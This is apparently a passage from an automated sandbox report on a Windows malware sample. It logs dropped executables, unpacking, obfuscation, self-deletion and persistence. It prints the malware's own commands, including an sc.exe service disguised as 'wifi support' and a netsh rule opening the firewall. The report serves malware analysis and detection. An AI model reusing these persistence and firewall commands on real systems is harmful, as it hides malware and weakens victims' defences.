                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: unknownProcess created: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\vsiicvb C:\Users\user\AppData\Roaming\vsiicvb
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E6AF.exe C:\Users\user\AppData\Local\Temp\E6AF.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FF1A.exe C:\Users\user\AppData\Local\Temp\FF1A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2D5.exe C:\Users\user\AppData\Local\Temp\2D5.exe
                      Source: C:\Users\user\AppData\Local\Temp\FF1A.exeProcess created: C:\Users\user\AppData\Local\Temp\FF1A.exe C:\Users\user\AppData\Local\Temp\FF1A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4ED.exe C:\Users\user\AppData\Local\Temp\4ED.exe
                      Source: C:\Users\user\AppData\Local\Temp\4ED.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1365.exe C:\Users\user\AppData\Local\Temp\1365.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\28B3.exe C:\Users\user\AppData\Local\Temp\28B3.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2941.exe C:\Users\user\AppData\Local\Temp\2941.exe
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeProcess created: C:\Users\user\Desktop\V91yW08J6p.exe "C:\Users\user\Desktop\V91yW08J6p.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7CCD.exe C:\Users\user\AppData\Local\Temp\7CCD.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\76E7.exe C:\Users\user\AppData\Local\Temp\76E7.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6902.exe C:\Users\user\AppData\Local\Temp\6902.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Users\user\AppData\Roaming\adiicvbProcess created: C:\Users\user\AppData\Roaming\adiicvb C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ejdjvovs
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7CCD.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_01
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: V91yW08J6p.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 7CCD.exe, 00000007.00000000.788685513.0000000000413000.00000002.00020000.sdmp, 7CCD.exe, 00000007.00000002.807583857.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\rativilo_s.pdb source: 76E7.exe, 00000008.00000000.801375549.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: Vt]C:\rero24 besar69\gomelafulogu m.pdb source: V91yW08J6p.exe, 00000000.00000002.674693489.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000000.00000000.666789569.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000002.00000000.672658801.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000000.766653368.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000002.776111156.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\rero24 besar69\gomelafulogu m.pdb source: V91yW08J6p.exe, 00000000.00000002.674693489.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000000.00000000.666789569.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000002.00000000.672658801.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000000.766653368.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000002.776111156.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\cedelecesi-roputewelu21\ropofarax15\ca.pdb source: 6902.exe, 0000000B.00000002.841823438.0000000000675000.00000004.00000020.sdmp, 6902.exe, 0000000B.00000000.808532336.0000000000413000.00000002.00020000.sdmp, 6902.exe, 0000000B.00000002.840524705.0000000000415000.00000002.00020000.sdmp, qxoxlxqh.exe, 0000001A.00000000.840734241.0000000000413000.00000002.00020000.sdmp, qxoxlxqh.exe, 0000001A.00000002.850054459.0000000000415000.00000002.00020000.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 7CCD.exe, 00000007.00000000.788685513.0000000000413000.00000002.00020000.sdmp, 7CCD.exe, 00000007.00000002.807583857.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: dC:\rativilo_s.pdb source: 76E7.exe, 00000008.00000000.801375549.0000000000413000.00000002.00020000.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeUnpacked PE file: 8.2.76E7.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeUnpacked PE file: 11.2.6902.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeUnpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeUnpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeUnpacked PE file: 7.2.7CCD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeUnpacked PE file: 8.2.76E7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeUnpacked PE file: 11.2.6902.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeUnpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 23.0.768F.exe.360000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00404869 push ecx; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00403433 push ecx; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00412504 push eax; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00533C66 push esi; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00533C01 push esi; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00543634 push es; iretd
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 2_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_00603C66 push esi; ret
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_00603C01 push esi; ret
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 5_2_00613634 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\adiicvbCode function: 6_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0047127E push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0047123C push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_0047735E push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: 7_2_004753C8 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_0041A514 push eax; retn 0054h
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_0041A39C pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020B5C53 push ss; retf
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020B128B push ebx; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020B3EE0 pushad ; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020B4941 pushfd ; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020B4973 pushfd ; ret
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020E3C00 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_002C8508 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_002C764A push esp; ret
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeCode function: 13_2_00D14003 push esi; retf
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00409CAE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: 1365.exe.3.drStatic PE information: 0xA029C1CD [Wed Feb 24 14:12:29 2055 UTC]
                      Source: 4ED.exe.3.drStatic PE information: section name: .7m512qw
                      Source: 28B3.exe.3.drStatic PE information: section name: .didat
                      Source: 2941.exe.3.drStatic PE information: section name: .code
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .edata
                      Source: initial sampleStatic PE information: section name: .edata entropy: 7.99737439266
                      Source: 768F.exe.3.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 13.0.768F.exe.2c0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 13.0.768F.exe.2c0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 13.2.768F.exe.2c0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 13.0.768F.exe.2c0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 23.0.768F.exe.360000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 23.0.768F.exe.360000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 23.0.768F.exe.360000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vsiicvbJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\adiicvbJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\adiicvbJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4ED.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6902.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2941.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2D5.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vsiicvbJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1365.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeFile created: C:\Users\user\AppData\Local\Temp\qxoxlxqh.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FF1A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\76E7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\768F.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E6AF.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\28B3.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7CCD.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe (copy)Jump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\v91yw08j6p.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\adiicvb:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess information set: NOGPFAULTERRORBOX
